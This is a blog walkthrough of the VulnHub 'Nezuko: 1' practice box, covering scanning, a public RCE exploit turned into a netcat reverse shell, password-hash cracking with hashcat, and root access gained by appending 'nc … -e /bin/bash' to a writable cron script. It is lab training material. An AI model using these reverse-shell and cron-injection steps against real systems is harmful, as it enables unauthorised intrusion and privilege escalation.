VulnHub Nezuko: 1 Walkthrough

Today we are doing nezuko: 1 from VulnHub. As usual, I also have a video walkthrough that you can find here.

This is a beginner level box and doesn’t take too long to get through.

We start of with our nmap scan: nmap -sV -sC -v 192.168.2.131 -oN map1

nez1

 

There’s a webport so let’s take a look at that.

nez2

Ok weird but whatever. Let’s see if there’s a robots.txt file.

nez3

There is and it’s a weird string. It kind of looks like base64, but it’s not. I’m not going to go into this here as the challenge is a little bit of a time suck. In the end it gives a rather pointless hint.

After finding the robots.txt file, I also ran a gobuster search: gobuster dir -u 192.168.2.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It produced one directory that was basically a dead end. I decided to run another nmap scan as I worked on the string from the robots.txt file.

nmap -sC -sV -v -p- -oN map2 192.168.2.131nez4

And this would make solving the string puzzle utterly useless. Here we find another web page. This one is using SSL so we’ll need to add https along with the port.

nez5

Here we confirm it’s a login page. Let’s check the version from the nmap scan and see if it’s vulnerable.

nez6

It looks like there’s a remote code execution vulnerability available. Let’s check it out.

Using searchsploit -m 47293 will copy it to the directory you’re in.

nez7

This exploit is really just a vuln scan. It doesn’t exploit anything but that doesn’t mean we can’t make it do what we want. There was also a Metasploit module available which works perfectly fine too if you want to go that route.

First, let’s just run this and see if it’s vulnerable.

nez8

Ok so this is a problem. After some quick searching it turns out that this can happen when copying scripts from a Windows environment to Linux. Opening it in a plain text editor and doing another copy paste seems to get rid of the bad character causing the problem.

nez9

Once we run it, the script confirms it’s vulnerable. Now let’s modify it to get a shell.

Basically, this script is sending a command (echo ‘flag’) and then searching to see if it executed. So if we just replace the echo command with a netcat reverse shell, we should get a connection (assuming netcat with the -e flag is on the box).

nez10

Once the code is in place, we set up a listener, run the code and …

nez11

nez12

We get a shell as nezuko!

Let’s see upgrade our shell.

It turns out that python2 is not installed, but we can still use python3.

nez13

Now let’s see what we can get into.

Looking at the /etc/passwd file we see two users … and a password hash!

nez14

Let’s crack the hash with hashcat. I copied the hash into a file and sent it to my Windows machine for cracking. Your command will be slightly different if using Linux.

hashcat64.exe -m 1800 nez.hash wordlists/rockyou.txt

After a few seconds, we get a password back … meowmeow

nez15

Let’s become the zenitsu user.

nez16

Ok now we’re zenitsu. Unfortunately, zenitsu does not have sudo permissions. Let’s see if there’s anything in the user directories.

nez17

Looking at nezuko’s directory it looks like zenitsu is asking nezuko out every 5 minutes. That’s a little creepy, obsessive, and stalkerish, but maybe we can use this to our advantage. Let’s look at zenitu’s directory and see if there’s a script.

nez19

nez18

Ok we did find a script and we’re able to write to it. Let’s add a netcat line and see if we get a shell back.

We’ll setup another netcat lister on our attack machine first: nc -nlvp 8888

echo ‘nc 192.168.2.126 8888 -e /bin/bash’ >> send_message_to_nezuko.sh

Next I just cat the file to make sure my code was appended.

nez20

Looks good. Now we wait …

After a few minutes we get a shell back

nez21

And we’re root!!!

Let’s get the final flag.

nez22

That was nezukochan. It’s not too difficult. The obscure hint took more time to track down for me than actually rooting the box. That might have been fine except that the hint doesn’t really help unless you’re really new at this stuff. If that’s the case, then you’d probably struggle decoding the hint as well.

If you’d like to see a video walkthrough where I show the Metasploit module and string decoding you can find it here.

 

Happy Hacking!

-R3a50n

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s